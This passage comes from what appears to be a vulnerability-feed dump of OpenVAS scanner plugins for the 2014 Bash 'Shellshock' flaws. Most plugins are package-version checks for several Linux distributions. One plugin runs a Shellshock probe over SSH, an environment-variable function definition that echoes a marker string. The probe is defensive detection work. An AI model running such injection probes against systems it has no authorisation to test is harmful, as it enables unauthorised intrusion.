"cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-03-17T23:00:40", "description": "The remote host is missing an update announced via the referenced Security Advisory.", "cvss3": {}, "published": "2015-09-08T00:00:00", "type": "openvas", "title": "Amazon Linux: Security Advisory (ALAS-2014-419)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-7169", "CVE-2014-7187", "CVE-2014-7186"], "modified": "2020-03-13T00:00:00", "id": "OPENVAS:1361412562310120078", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310120078", "sourceData": "# Copyright (C) 2015 Eero Volotinen\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) of their respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.120078\");\n script_version(\"2020-03-13T13:19:50+0000\");\n script_tag(name:\"creation_date\", value:\"2015-09-08 13:16:55 +0200 (Tue, 08 Sep 2015)\");\n script_tag(name:\"last_modification\", value:\"2020-03-13 13:19:50 +0000 (Fri, 13 Mar 2020)\");\n script_name(\"Amazon Linux: Security Advisory (ALAS-2014-419)\");\n script_tag(name:\"insight\", value:\"Multiple flaws were found in GNU Bash. Please see the references for more information.\");\n script_tag(name:\"solution\", value:\"Run yum update bash to update your system. Note that you may need to run yum clean all first.\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"URL\", value:\"https://alas.aws.amazon.com/ALAS-2014-419.html\");\n script_cve_id(\"CVE-2014-7186\", \"CVE-2014-7169\", \"CVE-2014-7187\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/amazon_linux\", \"ssh/login/release\");\n script_category(ACT_GATHER_INFO);\n script_tag(name:\"summary\", value:\"The remote host is missing an update announced via the referenced Security Advisory.\");\n script_copyright(\"Copyright (C) 2015 Eero Volotinen\");\n script_family(\"Amazon Linux Local Security Checks\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"AMAZON\") {\n if(!isnull(res = isrpmvuln(pkg:\"bash-debuginfo\", rpm:\"bash-debuginfo~4.1.2~15.21.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"bash-doc\", rpm:\"bash-doc~4.1.2~15.21.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"bash\", rpm:\"bash~4.1.2~15.21.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if(__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:36:27", "description": "Oracle Linux Local Security Checks ELSA-2014-1306", "cvss3": {}, "published": "2015-10-06T00:00:00", "type": "openvas", "title": "Oracle Linux Local Check: ELSA-2014-1306", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-7169", "CVE-2014-7187", "CVE-2014-7186"], "modified": "2018-09-28T00:00:00", "id": "OPENVAS:1361412562310123299", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310123299", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: ELSA-2014-1306.nasl 11688 2018-09-28 13:36:28Z cfischer $\n#\n# Oracle Linux Local Check\n#\n# Authors:\n# Eero Volotinen <eero.volotinen@solinor.com>\n#\n# Copyright:\n# Copyright (c) 2015 Eero Volotinen, http://solinor.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.123299\");\n script_version(\"$Revision: 11688 $\");\n script_tag(name:\"creation_date\", value:\"2015-10-06 14:01:57 +0300 (Tue, 06 Oct 2015)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-09-28 15:36:28 +0200 (Fri, 28 Sep 2018) $\");\n script_name(\"Oracle Linux Local Check: ELSA-2014-1306\");\n script_tag(name:\"insight\", value:\"ELSA-2014-1306 - bash security update. Please see the references for more insight.\");\n script_tag(name:\"solution\", value:\"Update the affected packages to the latest available version.\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"summary\", value:\"Oracle Linux Local Security Checks ELSA-2014-1306\");\n script_xref(name:\"URL\", value:\"http://linux.oracle.com/errata/ELSA-2014-1306.html\");\n script_cve_id(\"CVE-2014-7169\", \"CVE-2014-7186\", \"CVE-2014-7187\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/oracle_linux\", \"ssh/login/release\", re:\"ssh/login/release=OracleLinux(7|5|6)\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Eero Volotinen\");\n script_family(\"Oracle Linux Local Security Checks\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release) exit(0);\n\nres = \"\";\n\nif(release == \"OracleLinux7\")\n{\n if ((res = isrpmvuln(pkg:\"bash\", rpm:\"bash~4.2.45~5.el7_0.4\", rls:\"OracleLinux7\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"bash-doc\", rpm:\"bash-doc~4.2.45~5.el7_0.4\", rls:\"OracleLinux7\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n\n}\nif(release == \"OracleLinux5\")\n{\n if ((res = isrpmvuln(pkg:\"bash\", rpm:\"bash~3.2~33.el5_11.4\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n\n}\nif(release == \"OracleLinux6\")\n{\n if ((res = isrpmvuln(pkg:\"bash\", rpm:\"bash~4.1.2~15.el6_5.2\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"bash-doc\", rpm:\"bash-doc~4.1.2~15.el6_5.2\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n\n}\nif (__pkg_match) exit(99);\n exit(0);\n\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-01-31T18:39:55", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2014-10-01T00:00:00", "type": "openvas", "title": "openSUSE: Security Advisory for bash (openSUSE-SU-2014:1229-1)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-7169", "CVE-2014-7187", "CVE-2014-6271", "CVE-2014-7186"], "modified": "2020-01-31T00:00:00", "id": "OPENVAS:1361412562310850615", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310850615", "sourceData": "# Copyright (C) 2014 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) of their respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.850615\");\n script_version(\"2020-01-31T08:23:39+0000\");\n script_tag(name:\"last_modification\", value:\"2020-01-31 08:23:39 +0000 (Fri, 31 Jan 2020)\");\n script_tag(name:\"creation_date\", value:\"2014-10-01 16:58:25 +0530 (Wed, 01 Oct 2014)\");\n script_cve_id(\"CVE-2014-7169\", \"CVE-2014-7186\", \"CVE-2014-7187\", \"CVE-2014-6271\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_name(\"openSUSE: Security Advisory for bash (openSUSE-SU-2014:1229-1)\");\n\n script_tag(name:\"insight\", value:\"The command-line shell 'bash' evaluates environment variables, which\n allows the injection of characters and might be used to access files on\n the system in some circumstances (CVE-2014-7169).\n\n Please note that this issue is different from a previously fixed\n vulnerability tracked under CVE-2014-6271 and it is less serious due to\n the special, non-default system configuration that is needed to create an\n exploitable situation.\n\n To remove further exploitation potential we now limit the\n function-in-environment variable to variables prefixed with BASH_FUNC_ .\n This hardening feature is work in progress and might be improved in later\n updates.\n\n Additionally two more security issues were fixed in bash: CVE-2014-7186:\n Nested HERE documents could lead to a crash of bash.\n\n CVE-2014-7187: Nesting of for loops could lead to a crash of bash.\");\n\n script_tag(name:\"affected\", value:\"bash on openSUSE 12.3\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_xref(name:\"openSUSE-SU\", value:\"2014:1229-1\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'bash'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2014 Greenbone Networks GmbH\");\n script_family(\"SuSE Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/suse\", \"ssh/login/rpms\", re:\"ssh/login/release=openSUSE12\\.3\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"openSUSE12.3\") {\n if(!isnull(res = isrpmvuln(pkg:\"bash\", rpm:\"bash~4.2~61.15.1\", rls:\"openSUSE12.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"bash-debuginfo\", rpm:\"bash-debuginfo~4.2~61.15.1\", rls:\"openSUSE12.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"bash-debugsource\", rpm:\"bash-debugsource~4.2~61.15.1\", rls:\"openSUSE12.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"bash-devel\", rpm:\"bash-devel~4.2~61.15.1\", rls:\"openSUSE12.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"bash-loadables\", rpm:\"bash-loadables~4.2~61.15.1\", rls:\"openSUSE12.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"bash-loadables-debuginfo\", rpm:\"bash-loadables-debuginfo~4.2~61.15.1\", rls:\"openSUSE12.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libreadline6\", rpm:\"libreadline6~6.2~61.15.1\", rls:\"openSUSE12.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libreadline6-debuginfo\", rpm:\"libreadline6-debuginfo~6.2~61.15.1\", rls:\"openSUSE12.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"readline-devel\", rpm:\"readline-devel~6.2~61.15.1\", rls:\"openSUSE12.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"bash-debuginfo-32bit\", rpm:\"bash-debuginfo-32bit~4.2~61.15.1\", rls:\"openSUSE12.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libreadline6-32bit\", rpm:\"libreadline6-32bit~6.2~61.15.1\", rls:\"openSUSE12.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libreadline6-debuginfo-32bit\", rpm:\"libreadline6-debuginfo-32bit~6.2~61.15.1\", rls:\"openSUSE12.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"readline-devel-32bit\", rpm:\"readline-devel-32bit~6.2~61.15.1\", rls:\"openSUSE12.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"bash-doc\", rpm:\"bash-doc~4.2~61.15.1\", rls:\"openSUSE12.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"bash-lang\", rpm:\"bash-lang~4.2~61.15.1\", rls:\"openSUSE12.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"eadline-doc\", rpm:\"eadline-doc~6.2~61.15.1\", rls:\"openSUSE12.3\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if(__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-01-31T18:39:44", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2014-10-01T00:00:00", "type": "openvas", "title": "openSUSE: Security Advisory for bash (openSUSE-SU-2014:1242-1)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-7169", "CVE-2014-7187", "CVE-2014-6271", "CVE-2014-7186"], "modified": "2020-01-31T00:00:00", "id": "OPENVAS:1361412562310850616", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310850616", "sourceData": "# Copyright (C) 2014 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) of their respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.850616\");\n script_version(\"2020-01-31T08:23:39+0000\");\n script_tag(name:\"last_modification\", value:\"2020-01-31 08:23:39 +0000 (Fri, 31 Jan 2020)\");\n script_tag(name:\"creation_date\", value:\"2014-10-01 16:59:10 +0530 (Wed, 01 Oct 2014)\");\n script_cve_id(\"CVE-2014-7169\", \"CVE-2014-7186\", \"CVE-2014-7187\", \"CVE-2014-6271\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_name(\"openSUSE: Security Advisory for bash (openSUSE-SU-2014:1242-1)\");\n\n script_tag(name:\"insight\", value:\"The command-line shell 'bash' evaluates environment variables, which\n allows the injection of characters and might be used to access files on\n the system in some circumstances (CVE-2014-7169).\n\n Please note that this issue is different from a previously fixed\n vulnerability tracked under CVE-2014-6271 and it is less serious due to\n the special, non-default system configuration that is needed to create an\n exploitable situation.\n\n To remove further exploitation potential we now limit the\n function-in-environment variable to variables prefixed with BASH_FUNC_ .\n This hardening feature is work in progress and might be improved in later\n updates.\n\n Additionally two more security issues were fixed in bash: CVE-2014-7186:\n Nested HERE documents could lead to a crash of bash.\n\n CVE-2014-7187: Nesting of for loops could lead to a crash of bash.\");\n\n script_tag(name:\"affected\", value:\"bash on openSUSE 13.1\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_xref(name:\"openSUSE-SU\", value:\"2014:1242-1\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'bash'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2014 Greenbone Networks GmbH\");\n script_family(\"SuSE Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/suse\", \"ssh/login/rpms\", re:\"ssh/login/release=openSUSE13\\.1\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"openSUSE13.1\") {\n if(!isnull(res = isrpmvuln(pkg:\"bash\", rpm:\"bash~4.2~68.8.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"bash-debuginfo\", rpm:\"bash-debuginfo~4.2~68.8.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"bash-debugsource\", rpm:\"bash-debugsource~4.2~68.8.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"bash-devel\", rpm:\"bash-devel~4.2~68.8.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"bash-loadables\", rpm:\"bash-loadables~4.2~68.8.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"bash-loadables-debuginfo\", rpm:\"bash-loadables-debuginfo~4.2~68.8.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libreadline6\", rpm:\"libreadline6~6.2~68.8.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libreadline6-debuginfo\", rpm:\"libreadline6-debuginfo~6.2~68.8.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"readline-devel\", rpm:\"readline-devel~6.2~68.8.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"bash-debuginfo-32bit\", rpm:\"bash-debuginfo-32bit~4.2~68.8.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libreadline6-32bit\", rpm:\"libreadline6-32bit~6.2~68.8.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libreadline6-debuginfo-32bit\", rpm:\"libreadline6-debuginfo-32bit~6.2~68.8.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"readline-devel-32bit\", rpm:\"readline-devel-32bit~6.2~68.8.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"bash-doc\", rpm:\"bash-doc~4.2~68.8.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"bash-lang\", rpm:\"bash-lang~4.2~68.8.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"eadline-doc\", rpm:\"eadline-doc~6.2~68.8.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if(__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:37:40", "description": "This host is installed with GNU Bash Shell\n and is prone to remote command execution vulnerability.", "cvss3": {}, "published": "2014-10-01T00:00:00", "type": "openvas", "title": "GNU Bash Environment Variable Handling Shell RCE Vulnerability (LSC) - 03", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-7169", "CVE-2014-6277", "CVE-2014-6278", "CVE-2014-6271"], "modified": "2018-11-27T00:00:00", "id": "OPENVAS:1361412562310802085", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310802085", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_bash_shellshock_credential_cmd_exec_vuln_03.nasl 12551 2018-11-27 14:35:38Z cfischer $\n#\n# GNU Bash Environment Variable Handling Shell RCE Vulnerability (LSC) - 03\n#\n# Authors:\n# Veerendra GG <veerendragg@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2014 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:gnu:bash\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.802085\");\n script_version(\"$Revision: 12551 $\");\n script_cve_id(\"CVE-2014-6278\");\n script_bugtraq_id(70166);\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-11-27 15:35:38 +0100 (Tue, 27 Nov 2018) $\");\n script_tag(name:\"creation_date\", value:\"2014-10-01 15:52:31 +0530 (Wed, 01 Oct 2014)\");\n script_name(\"GNU Bash Environment Variable Handling Shell RCE Vulnerability (LSC) - 03\");\n script_category(ACT_ATTACK);\n script_copyright(\"Copyright (C) 2014 Greenbone Networks GmbH\");\n script_family(\"General\");\n script_dependencies(\"gb_gnu_bash_detect_lin.nasl\");\n script_mandatory_keys(\"bash/linux/detected\");\n script_exclude_keys(\"ssh/force/pty\");\n\n script_xref(name:\"URL\", value:\"https://ftp.gnu.org/gnu/bash/\");\n script_xref(name:\"URL\", value:\"https://shellshocker.net/\");\n script_xref(name:\"URL\", value:\"http://lcamtuf.blogspot.in/2014/09/bash-bug-apply-unofficial-patch-now.html\");\n\n script_tag(name:\"summary\", value:\"This host is installed with GNU Bash Shell\n and is prone to remote command execution vulnerability.\");\n\n script_tag(name:\"vuldetect\", value:\"Login to the target machine with ssh\n credentials and check its possible to execute the commands via GNU bash shell.\");\n\n script_tag(name:\"insight\", value:\"GNU bash contains a flaw that is triggered\n when evaluating environment variables passed from another environment.\n After processing a function definition, bash continues to process trailing\n strings. Incomplete fix to CVE-2014-7169, CVE-2014-6271, and CVE-2014-6277\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow remote\n or local attackers to inject shell commands, allowing local privilege\n escalation or remote command execution depending on the application vector.\");\n\n script_tag(name:\"affected\", value:\"GNU Bash through 4.3 bash43-026\");\n\n script_tag(name:\"solution\", value:\"Apply the patch from the referenced advisory.\");\n\n script_tag(name:\"qod_type\", value:\"exploit\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"ssh_func.inc\");\ninclude(\"host_details.inc\");\n\nif( get_kb_item( \"ssh/force/pty\" ) ) exit( 0 );\n\nif( isnull( port = get_app_port( cpe:CPE, service:\"ssh-login\" ) ) ) exit( 0 );\nif( ! bin = get_app_location( cpe:CPE, port:port ) ) exit( 0 ); # Returns e.g. \"/bin/bash\" or \"unknown\" (if the location of the binary wasn't detected).\n\nsock = ssh_login_or_reuse_connection();\nif( ! sock ) exit( 0 );\n\nif( bin == \"unknown\" )\n bash_cmd = \"bash\";\nelse if( bin =~ \"^/.*bash$\" )\n bash_cmd = bin;\nelse\n exit( 0 ); # Safeguard if something is broken in the bash detection\n\n# echo \"vt_test='() { echo vulnerable; }' /bin/bash -c vt_test\" | /bin/bash\ncmd = 'echo \"' + \"vt_test='() { echo CVE-2014-6278 vulnerable; }' \" + bash_cmd + \" -c vt_test\" + '\" | ' + bash_cmd;\n\nresult = ssh_cmd( socket:sock, cmd:cmd, nosh:TRUE );\nclose( sock );\n\nif( \"Unsupported use of '='\" >< result ) exit( 99 );\n\nif( \"CVE-2014-6278 vulnerable\" >< result ) {\n report = \"Used command: \" + cmd + '\\n\\nResult: ' + result;\n security_message( port:0, data:report );\n exit( 0 );\n}\n\nexit( 99 );", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-01-31T18:38:14", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2015-10-13T00:00:00", "type": "openvas", "title": "SUSE: Security Advisory for bash (SUSE-SU-2014:1247-1)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-7169", "CVE-2014-7187", "CVE-2014-6271", "CVE-2014-7186"], "modified": "2020-01-31T00:00:00", "id": "OPENVAS:1361412562310850778", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310850778", "sourceData": "# Copyright (C) 2015 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.850778\");\n script_version(\"2020-01-31T07:58:03+0000\");\n script_tag(name:\"last_modification\", value:\"2020-01-31 07:58:03 +0000 (Fri, 31 Jan 2020)\");\n script_tag(name:\"creation_date\", value:\"2015-10-13 18:35:00 +0530 (Tue, 13 Oct 2015)\");\n script_cve_id(\"CVE-2014-7169\", \"CVE-2014-7186\", \"CVE-2014-7187\", \"CVE-2014-6271\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"SUSE: Security Advisory for bash (SUSE-SU-2014:1247-1)\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'bash'\n package(s) announced via the referenced advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"The command-line shell 'bash' evaluates environment variables, which\n allows the injection of characters and might be used to access files on\n the system in some circumstances (CVE-2014-7169).\n\n Please note that this issue is different from a previously fixed\n vulnerability tracked under CVE-2014-6271 and is less serious due to the\n special, non-default system configuration that is needed to create an\n exploitable situation.\n\n To remove further exploitation potential we now limit the\n function-in-environment variable to variables prefixed with BASH_FUNC_.\n This hardening feature is work in progress and might be improved in later\n updates.\n\n Additionally, two other security issues have been fixed:\n\n * CVE-2014-7186: Nested HERE documents could lead to a crash of bash.\n\n * CVE-2014-7187: Nesting of for loops could lead to a crash of bash.\");\n\n script_tag(name:\"affected\", value:\"bash on SUSE Linux Enterprise Server 11 SP3\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_xref(name:\"SUSE-SU\", value:\"2014:1247-1\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2015 Greenbone Networks GmbH\");\n script_family(\"SuSE Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n 